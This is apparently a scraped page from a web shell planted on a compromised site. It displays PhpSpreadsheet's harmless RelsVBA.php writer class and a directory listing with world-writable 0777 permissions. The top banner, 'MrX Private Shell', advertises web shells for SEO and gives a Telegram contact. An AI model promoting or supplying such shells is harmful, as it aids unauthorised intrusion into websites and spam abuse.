__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace PhpOffice\PhpSpreadsheet\Writer\Xlsx;
use PhpOffice\PhpSpreadsheet\Reader\Xlsx\Namespaces;
use PhpOffice\PhpSpreadsheet\Shared\XMLWriter;
class RelsVBA extends WriterPart
{
/**
* Write relationships for a signed VBA Project.
*
* @return string XML Output
*/
public function writeVBARelationships()
{
// Create XML writer
$objWriter = null;
if ($this->getParentWriter()->getUseDiskCaching()) {
$objWriter = new XMLWriter(XMLWriter::STORAGE_DISK, $this->getParentWriter()->getDiskCachingDirectory());
} else {
$objWriter = new XMLWriter(XMLWriter::STORAGE_MEMORY);
}
// XML header
$objWriter->startDocument('1.0', 'UTF-8', 'yes');
// Relationships
$objWriter->startElement('Relationships');
$objWriter->writeAttribute('xmlns', Namespaces::RELATIONSHIPS);
$objWriter->startElement('Relationship');
$objWriter->writeAttribute('Id', 'rId1');
$objWriter->writeAttribute('Type', Namespaces::VBA_SIGNATURE);
$objWriter->writeAttribute('Target', 'vbaProjectSignature.bin');
$objWriter->endElement();
$objWriter->endElement();
return $objWriter->getData();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| AutoFilter.php | File | 4.83 KB | 0777 |
|
| Chart.php | File | 74.72 KB | 0777 |
|
| Comments.php | File | 7.75 KB | 0777 |
|
| ContentTypes.php | File | 11.84 KB | 0777 |
|
| DefinedNames.php | File | 8.52 KB | 0777 |
|
| DocProps.php | File | 8.58 KB | 0777 |
|
| Drawing.php | File | 21.29 KB | 0777 |
|
| FunctionPrefix.php | File | 4.82 KB | 0777 |
|
| Rels.php | File | 16.24 KB | 0777 |
|
| RelsRibbon.php | File | 1.52 KB | 0777 |
|
| RelsVBA.php | File | 1.24 KB | 0777 |
|
| StringTable.php | File | 12.85 KB | 0777 |
|
| Style.php | File | 26.65 KB | 0777 |
|
| Table.php | File | 4.68 KB | 0777 |
|
| Theme.php | File | 21.15 KB | 0777 |
|
| Workbook.php | File | 7.8 KB | 0777 |
|
| Worksheet.php | File | 61.93 KB | 0777 |
|
| WriterPart.php | File | 529 B | 0777 |
|